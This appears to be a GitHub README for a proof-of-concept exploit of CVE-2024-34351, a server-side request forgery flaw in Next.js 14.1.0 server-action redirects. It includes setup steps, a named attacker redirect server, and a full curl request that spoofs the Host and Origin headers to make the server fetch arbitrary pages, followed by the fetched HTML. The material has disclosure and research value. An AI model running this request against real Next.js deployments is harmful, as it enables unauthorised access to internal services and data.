azu/nextjs-CVE-2024-34351

CVE-2024-34351 PoC

Summary

Attacker can get any website content from Next.js server using CVE-2024-34351 vulnerability: This Next.js(next@14.1.0) server has vulnerable redirect action.

nextjs-CVE-2024-34351/src/app/actions.ts

Lines 5 to 8 in 687c1ff

    
           export async function create() { 
        
             console.log('Server Side') 
        
             return redirect("/?voorivex"); 
        
           }

This vulnerability is fixed in next@14.1.1.

Usage

Start Next.js server which uses next@14.1.0.

npm install
npm run dev

Attacker need to prepare a redirect sever for sniffing.

Source: attacker-server/main.ts
- https://nextjs-cve-2024-34351.deno.dev/ is prepared for this PoC.

Finally, attacker can fetch from the Next.js server to any website content using SSRF vulnerability.

Add Host header to attacker server
Change Origin header to attacker server

curl 'http://localhost:3000/' \
  -H 'Host: nextjs-cve-2024-34351.deno.dev' \
  -H 'Accept: text/x-component' \
  -H 'Accept-Language: ja,en-US;q=0.9,en;q=0.8' \
  -H 'Cache-Control: no-cache' \
  -H 'Connection: keep-alive' \
  -H 'Content-Type: text/plain;charset=UTF-8' \
  -H 'Next-Action: 1529e716c9db41d5ce462b285ea3d42d09292bd2' \
  -H 'Next-Router-State-Tree: %5B%22%22%2C%7B%22children%22%3A%5B%22__PAGE__%22%2C%7B%7D%5D%7D%2Cnull%2Cnull%2Ctrue%5D' \
  -H 'Origin: http://nextjs-cve-2024-34351.deno.dev' \
  -H 'Pragma: no-cache' \
  -H 'Referer: http://localhost:3000/' \
  -H 'Sec-Fetch-Dest: empty' \
  -H 'Sec-Fetch-Mode: cors' \
  -H 'Sec-Fetch-Site: same-origin' \
  -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36' \
  -H 'sec-ch-ua: "Not/A)Brand";v="8", "Chromium";v="126", "Google Chrome";v="126"' \
  -H 'sec-ch-ua-mobile: ?0' \
  -H 'sec-ch-ua-platform: "macOS"' \
  --data-raw '[]'

<!doctype html>
<html>
<head>
    <title>Example Domain</title>

    <meta charset="utf-8" />
    <meta http-equiv="Content-type" content="text/html; charset=utf-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1" />
    <style type="text/css">
    body {
        background-color: #f0f0f2;
        margin: 0;
        padding: 0;
        font-family: -apple-system, system-ui, BlinkMacSystemFont, "Segoe UI", "Open Sans", "Helvetica Neue", Helvetica, Arial, sans-serif;

    }
    div {
        width: 600px;
        margin: 5em auto;
        padding: 2em;
        background-color: #fdfdff;
        border-radius: 0.5em;
        box-shadow: 2px 3px 7px 2px rgba(0,0,0,0.02);
    }
    a:link, a:visited {
        color: #38488f;
        text-decoration: none;
    }
    @media (max-width: 700px) {
        div {
            margin: 0 auto;
            width: auto;
        }
    }
    </style>
</head>

<body>
<div>
    <h1>Example Domain</h1>
    <p>This domain is for use in illustrative examples in documents. You may use this
    domain in literature without prior coordination or asking for permission.</p>
    <p><a href="https://www.iana.org/domains/example">More information...</a></p>
</div>
</body>
</html>

	export async function create() {
	console.log('Server Side')
	return redirect("/?voorivex");
	}